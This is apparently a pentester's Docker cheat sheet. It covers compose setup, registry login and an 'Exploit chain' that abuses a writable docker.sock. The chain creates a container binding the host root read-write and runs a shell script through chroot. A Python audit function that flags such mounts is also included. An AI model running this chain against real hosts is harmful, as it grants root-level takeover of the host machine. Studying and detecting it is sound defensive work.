Docker

  • Configurations.

## ------------------| docker-compose.yaml
version: "3"                    ## optional since v1.27.0
services:                
    website:                    ## Service name
        image: nginx            
        ports:
            - "8080:80"
        restart: always         ## Always restart, including after a machine reboot
       
         
## ------------------| Start/Stop
### Start/Run
sudo docker-compose up -d
### Stop/Down
sudo docker-compose stop
sudo docker-compose down
  • Is the Docker socket writable?

## ------------------| How to check
ls -al /var/run/docker.sock

## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

## ------------------| Exploit chain
### Create a new container --> map the root drive
### We need to know which image we can use; run the following command and take the RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]'

### Create json object in file !!! Remove comments!!!
{
    "Image" : "sandbox", ## <---- RepoTags value
    "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
    "Binds" : [
        "/:/mnt:rw"
    ]
}

### use curl command to create new container
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create           

### Get id value; replace; start
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
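
The chain above depends on the daemon accepting a create request that bind-mounts the host root. The following is an added example, not part of the original page: a check that flags such `/containers/create` bodies, assuming they are captured by a socket proxy or authorization plugin in front of `docker.sock`. The function names, the sensitive-path list and the sample bodies are assumptions constructed for illustration.

```python
import json
import posixpath

# Host paths whose bind mount hands the container control of the host.
# This list is an assumption for the example; extend it for your environment.
SENSITIVE_SOURCES = ("/", "/etc", "/root", "/var/run/docker.sock", "/run/docker.sock")


def parse_bind(spec):
    """Split a 'source:dest[:options]' bind string into its parts."""
    parts = spec.split(":")
    source = posixpath.normpath(parts[0])
    dest = parts[1] if len(parts) > 1 else ""
    opts = parts[2].split(",") if len(parts) > 2 else []
    return source, dest, opts


def audit_create_request(body):
    """Return a list of findings for one /containers/create JSON body."""
    req = json.loads(body)
    host_cfg = req.get("HostConfig") or {}
    # Binds may sit under HostConfig or, as in the payload above, at top level.
    binds = (host_cfg.get("Binds") or []) + (req.get("Binds") or [])
    findings = []
    for spec in binds:
        source, dest, opts = parse_bind(spec)
        if source in SENSITIVE_SOURCES:
            mode = "read-only" if "ro" in opts else "read-write"
            findings.append(f"host path {source} bound to {dest} ({mode})")
    if host_cfg.get("Privileged"):
        findings.append("container requested Privileged mode")
    return findings


# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    '{"Image": "sandbox", "Cmd": ["/bin/sh"], "Binds": ["/:/mnt:rw"]}',
    '{"Image": "nginx", "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}',
    '{"Image": "ci", "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"], "Privileged": true}}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(audit_create_request(body) or "ok")
```

A request with any finding is a candidate for denial or alerting; the ordinary read-only content mount in the second sample passes clean.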
  • Login

## ------------------| Normal login
docker login <URL>

## ------------------| If it has certificate file
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL>

cat /etc/docker/daemon.json
{
   "insecure-registries":["docker.registry.htb:443"]
}

Last updated 2 years ago
